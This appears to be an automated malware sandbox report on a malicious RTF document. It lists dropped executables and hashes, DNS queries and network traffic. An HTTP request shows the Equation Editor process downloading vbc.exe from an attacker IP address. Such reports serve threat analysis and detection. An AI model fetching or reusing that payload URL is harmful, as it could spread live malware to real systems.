                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):3.4026006717034902
                                                    Encrypted:false
                                                    SSDEEP:96:qUNznlUendEJjgCjk6/AT/xe6GpzSsP8R/H2+MruA:vNLlU3N4qAdelpDrZ
                                                    MD5:6A03999AB0CB0C5B22C3F36304D7DF9E
                                                    SHA1:0410F0A14C2F86175D2B25928DEC09704DC9C589
                                                    SHA-256:048D9654BBA670FD989CD23C3341C5E43694FBE6A2A52275D6C7EC51A8DD960A
                                                    SHA-512:DC091B2E68787E7594391C208D8ECFF7E81658DAEFB686E742B02A12D8FEB91B63CD506DE1204E72508210D68C8E54080512ED7E2C6C6CFDD405508790DB2CBC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: |.!.`.=._.-.^.;...<.?.*.?.^.?.!.^.!.%...%._...?.5.7.#.~.:.7.@.9.:.[.:.6.~.?.%.@...<...2._.=.!.!.!.4.,.9.?.?.].%.?.%.].[.+._.3.9.*.9.~.&.%.3.=.?.0.#.4.2.>.>.|.;.~.1.).@.;.5.4.@.?.)./.?.,.?.7.;.5.?.%.?.6.7.7.)...^.9._.?.|.9.3.4.~.|.,.&.2.8._.5.?.3./.2.+.4...%.%.0.?.`.^.(.3.].?.%.~.)...1.2.!./.#.*.~.%.?...].|...>.+.7.-._.-.@.@.2.?.*.<.&.).>.@.;.:.].>.$.?.[...?._.!.|.&.%.=.8.<.&.2.`.4.%.!._.*.~...~.8.'.%.+.%.1.>.?.%.]...'...*.7.$.'.4...|.'.,.9.~.'.=.7.!.!.4.7.../.?.?.;.9.:.,.:.#.?.%...<.[.8.'./.7...-.&.%.&.1.#...&.;.].6.+.%.].=.?.).*.0.-.4.|.-.^._.3._.5...?.%.$.-.+.|.^.9...7.#.@.~.&.3.!.!...%.|...;.2.>.2.....].=...6.8.).6.2.3.~.+.[.#.?...=.#.@.?.....@.#...;.2.?.:.`...!.....(.?.+.2.@.?.[.+.*.9.*.9.&.3.?.&.?...'._.;...<.5.!.(...=.1.1.2.~.3.1.>.1.!.+.%.~.1.&.,.3.!.?.].,.%.>.(.5.$.^.|.<.~.?.,.?.%.;.;.'.`.@.7.*.[.?.'.3._.~.;.'.+.=.2._.1.&.<.'.(.5.(.2.+.,...].'.2.!.0.+.-.1.+.?.8...?.|.0.!...*.3.?.<.!.?.;.:.?.*.&.-.$.'.?.3.].;.!.%.5.=./.$.;./.?.%.+.=.$.=.|.%.>.[.&.'...~.!.8.%.3.'.^...&.>.?.8.).$.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AEABBCA8-0F81-4D81-B8F1-603A5AA42D28}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                    Process:C:\Users\Public\vbc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):21304624
                                                    Entropy (8bit):0.09518636040127255
                                                    Encrypted:false
                                                    SSDEEP:1536:j30RIkuZxe033g6Oixa+IC8KNXA/wMy2dWVu2h55nw6+717EQZ4yr3hShX:j30qHZxT3gsxaZmNXYy7zysx
                                                    MD5:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                    SHA1:5AABAD649F6C4B826C30BDF8152E6F8D33CB8133
                                                    SHA-256:7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
                                                    SHA-512:EBF93E81A0AB530EA19131F490A2423E017384357731FBE5CAC4D60876C5B535E371BB9443D62AEA8F41D732079EAB2A6EDD4335EDEAAD086EED2410D5914F54
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L....#L......................B.....$........ ....@...........................E......QE.....................................t...(....0....B.........P.E.....................................................0... ....................................text...$........................... ..`.data...p.... ....... ..............@....rsrc.....B..0....B..0..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\misv.exe
                                                    Process:C:\Users\user\AppData\Roaming\misv.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):21214512
                                                    Entropy (8bit):0.09651890759201205
                                                    Encrypted:false
                                                    SSDEEP:1536:eMFtMi1UWzCVv7k95bpw45zcJHJEWR4kpDatDwlvpa7WA/xJ2gaQsv6hWfI3hR2S:1jMCUWUv7k95Vw4pupzRrNAFI+2S
                                                    MD5:267CE829152E1E6B2493EE80291C3E6D
                                                    SHA1:814FEDAD9318740DC21569DA4B900AC9A2CE1270
                                                    SHA-256:25526139AACB45F3F8C4F5A6623CA50635163E882F922B908F5A3BF3A94D42EE
                                                    SHA-512:3CF20247D421E04D6D154B7C5F8B31943A4DA6FF7EF677A9DD290AF745AD89F802209D6FFD4C573B02186CEDDCB73784E772FA9599A6C88CD2D05C0656A0050B
                                                    Malicious:false
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L..../.I......................A.....$........ ....@...........................C......C.........................................(....0..plA.........P.C.....................................................0... ....................................text............................... ..`.data...p.... ....... ..............@....rsrc...plA..0...pA..0..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QEw7lxB2iE.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 03:08:19 2021, mtime=Thu Dec 2 03:08:19 2021, atime=Thu Dec 2 03:08:22 2021, length=21019, window=hide
                                                    Category:dropped
                                                    Size (bytes):1014
                                                    Entropy (8bit):4.5503170299170215
                                                    Encrypted:false
                                                    SSDEEP:12:8rFgXg/XAlCPCHaXmk5BeXB/O7X+W5HwjM4FicvbV94q4zDtZ3YilMMEpxRljK5o:83/XTD5wXQmcexkzDv3qYQd7Qy
                                                    MD5:068A07156F8CAADD3AC0673C314F7D47
                                                    SHA1:94D24F6AC962391FE5851FE980472B767D86560A
                                                    SHA-256:DE32ACAAECD335A351E3A8FB65EFD2225019A88CCF55FC4B2F0103BEB2B4D250
                                                    SHA-512:C42E5988E2715CF15AC59117F84E73FD69341297419D474EDC560DA15F06EB0F9271C084E880CEBDF82ABEE982B3E44F442959F85D42587725B5D19A1F96D6C6
                                                    Malicious:false
                                                    Preview: L..................F.... .....=2.....=2.....P?2....R...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S#...user.8......QK.X.S#.*...&=....U...............A.l.b.u.s.....z.1......S.!..Desktop.d......QK.X.S.!*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..R...S.! .QEW7LX~1.RTF..J......S.!.S.!*.........................Q.E.w.7.l.x.B.2.i.E...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop\QEw7lxB2iE.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.E.w.7.l.x.B.2.i.E...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......472847..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):72
                                                    Entropy (8bit):4.780851828270856
                                                    Encrypted:false
                                                    SSDEEP:3:bDuMJlsKeOp5omxW/X6eOp5ov:bCGp5MX2p5y
                                                    MD5:17D0947E550109E0754ADB0DFD912C6B
                                                    SHA1:F8B77E38D4B15EF2A948DF8EF5BB5382DF5814B9
                                                    SHA-256:83C2FF3542C8E6702E1F0524E253EF6E3F96C575BE8CFAE48AE5BE9AE91B6B68
                                                    SHA-512:5C7F811193D71D92AC7007F57FE8E454961B41F1C580AF4A5306045BB4C487767824E8192CDEF891BA6D26D7774BEC8D111180D900F678A6BA91D383B4A2FCBA
                                                    Malicious:false
                                                    Preview: [folders]..Templates.LNK=0..QEw7lxB2iE.LNK=0..[misc]..QEw7lxB2iE.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.5038355507075254
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0FSXK8N5.txt
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):63
                                                    Entropy (8bit):4.111834789013062
                                                    Encrypted:false
                                                    SSDEEP:3:vpqMLJUQ2IQbS6KbdvW2Dyn:vEMWXBObtvOn
                                                    MD5:04CDAB7B0044E4892C3550529A440D49
                                                    SHA1:617CEC3484FE180124A4DCB5B7AAE4633267091B
                                                    SHA-256:C76B1EFC3BA0490BD6ED9247E1DEAF07C47FF7624104F9D69688704D457EF8BD
                                                    SHA-512:4FF6C84B66657B5AA7436B0C99C87236949CDEDC08D230887BC8DD452B1B870D21DEC8D8FAC4237087DBAE9CB1ED69A5C82BF15543C456AD4F93FA0367EBEFCE
                                                    Malicious:false
                                                    Preview: wla42..live.com/.1536.1453494400.30927975.888365908.30926643.*.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1HY28YNR.txt
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):63
                                                    Entropy (8bit):4.007486964320904
                                                    Encrypted:false
                                                    SSDEEP:3:vpqMLJUQ2JmX0WXTyn:vEMWXJMf+n
                                                    MD5:5A9BE808380CE36ED4D572C161AAEABF
                                                    SHA1:AE3E082BBA750ADBAFC6F2D7C4D38DAD5B971A1C
                                                    SHA-256:A8F3C3FCE4FFAF620E009AE46A2CCC5C3D1B3F44F391C9E91BA9373F55A09D9A
                                                    SHA-512:872F92A1EAEAA861B3730AFAFE5F6672AC6B6408C4A3040D3C0CDB4187FB2E39C5AD7D99DF22D0BF1EEC01C4D9E0A5F48D5CDA604F78BB64B33C9D75DFF93E7D
                                                    Malicious:false
                                                    IE Cache URL:live.com/
                                                    Preview: wla42..live.com/.1536.1523494400.30927975.957473499.30926643.*.
                                                    C:\Users\user\AppData\Roaming\misv.exe
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):135018
                                                    Entropy (8bit):7.060957913639306
                                                    Encrypted:false
                                                    SSDEEP:3072:gbG7N2kDTHUpou4ubvh1q2SRdteVQNOqeOEgyVlzba:gbE/HUjva2udnNOqbByVlPa
                                                    MD5:1DA682EC8DCBC375B6E76660EF46D3FD
                                                    SHA1:B7DA4D771226B5A4F045B0D8A263451612EE3303
                                                    SHA-256:6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
                                                    SHA-512:2077475610EAA19020D7AFA36896B3E995D66651F4D0E8B4EB8523D64EA8C4B5C48778081182C033FD3C330A253EF8FA34E935BAD4EF7947CD17EE09B126AA4F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\Desktop\~$w7lxB2iE.rtf
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.5038355507075254
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\Public\vbc.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):131595
                                                    Entropy (8bit):7.073841941088541
                                                    Encrypted:false
                                                    SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                    MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                    SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                    SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                    SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, unknown version
                                                    Entropy (8bit):3.815785816957243
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:QEw7lxB2iE.rtf
                                                    File size:21019
                                                    MD5:4e84044d53a87d7e839374d7cade49cc
                                                    SHA1:7a1b45ff36797c9607c3dd75d1c73830925dde6a
                                                    SHA256:08c01681e8ff89e3bf3f3d3dda76c0a026607f7f4cc3ec8dfbe77ec4c9a45ee3
                                                    SHA512:9160fdd19adae71776d9be4d0a63103f306cf9a26d7b27823634ef440cae5b93fed74b43270875d7eb3e13c3c36c92506c3fb95fd86abd0e0012f0796e549e8d
                                                    SSDEEP:384:l8TOybQcOD5ggZchSblcI8gVrALQoGN/HEY+Cmlc9Rr:l8TjED59X1rAWNvWCZ
                                                    File Content Preview:{\rtf64893|!`=_-^;.<?*?^?!^!%.%_.?57#~:7@9:[:6~?%@.<.2_=!!!4,9??]%?%][+_39*9~&%3=?0#42>>|;~1)@;54@?)/?,?7;5?%?677).^9_?|934~|,&28_5?3/2+4.%%0?`^(3]?%~).12!/#*~%?.]|.>+7-_-@@2?*<&)>@;:]>$?[.?_!|&%=8<&2`4%!_*~.~8'%+%1>?%].'.*7$'4.|',9~'=7!!47./??;9:,:#?%.<[

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static RTF Info

                                                    Objects

                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000000642hno
                                                    1000005FChno

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 1, 2021 20:09:11.688323021 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:11.801793098 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:11.803730011 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:11.804644108 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:11.919054985 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:11.919095039 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:11.919112921 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:11.919135094 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:11.919215918 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:11.919270992 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.033863068 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.033900976 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.033934116 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.033967018 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.033998966 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.034024000 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.034056902 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.034081936 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.034090042 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.034133911 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.034142017 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.034147024 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.034152031 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.147603035 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147651911 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147701979 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147751093 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147799969 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147829056 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.147857904 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147861958 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.147912979 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.147917032 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.147969961 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148004055 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148029089 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148045063 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148087978 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148116112 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148147106 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148149967 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148204088 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148221016 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148262978 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148267031 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148320913 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148325920 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148377895 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148394108 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148437977 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.148473024 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.148509026 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.150969982 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262015104 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262057066 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262095928 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262134075 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262173891 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262208939 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262213945 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262245893 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262254000 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262271881 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262295008 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262296915 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262335062 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262367010 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262373924 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262382984 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262412071 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262414932 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262455940 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262470007 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262496948 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262520075 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262537003 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262547016 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262576103 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262603998 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262615919 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262624025 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262656927 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262680054 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262691975 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262695074 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262733936 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262756109 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262768984 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262772083 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262811899 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262826920 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262851000 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262861013 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262891054 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262917042 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262929916 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262937069 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.262969971 CET8049165192.3.122.180192.168.2.22
                                                    Dec 1, 2021 20:09:12.262994051 CET4916580192.168.2.22192.3.122.180
                                                    Dec 1, 2021 20:09:12.263008118 CET8049165192.3.122.180192.168.2.22

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 1, 2021 20:11:00.655292988 CET5216753192.168.2.228.8.8.8
                                                    Dec 1, 2021 20:11:01.916327953 CET5059153192.168.2.228.8.8.8
                                                    Dec 1, 2021 20:11:08.799299002 CET5780553192.168.2.228.8.8.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Dec 1, 2021 20:11:00.655292988 CET192.168.2.228.8.8.80xcc49Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                    Dec 1, 2021 20:11:01.916327953 CET192.168.2.228.8.8.80x9fc9Standard query (0)eruitg.bl.files.1drv.comA (IP address)IN (0x0001)
                                                    Dec 1, 2021 20:11:08.799299002 CET192.168.2.228.8.8.80x647fStandard query (0)fspzka.bl.files.1drv.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Dec 1, 2021 20:11:00.674299002 CET8.8.8.8192.168.2.220xcc49No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                    Dec 1, 2021 20:11:01.962426901 CET8.8.8.8192.168.2.220x9fc9No error (0)eruitg.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                    Dec 1, 2021 20:11:01.962426901 CET8.8.8.8192.168.2.220x9fc9No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                    Dec 1, 2021 20:11:08.851640940 CET8.8.8.8192.168.2.220x647fNo error (0)fspzka.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                    Dec 1, 2021 20:11:08.851640940 CET8.8.8.8192.168.2.220x647fNo error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 192.3.122.180

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165192.3.122.18080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Dec 1, 2021 20:09:11.804644108 CET0OUTGET /2200/vbc.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 192.3.122.180
                                                    Connection: Keep-Alive
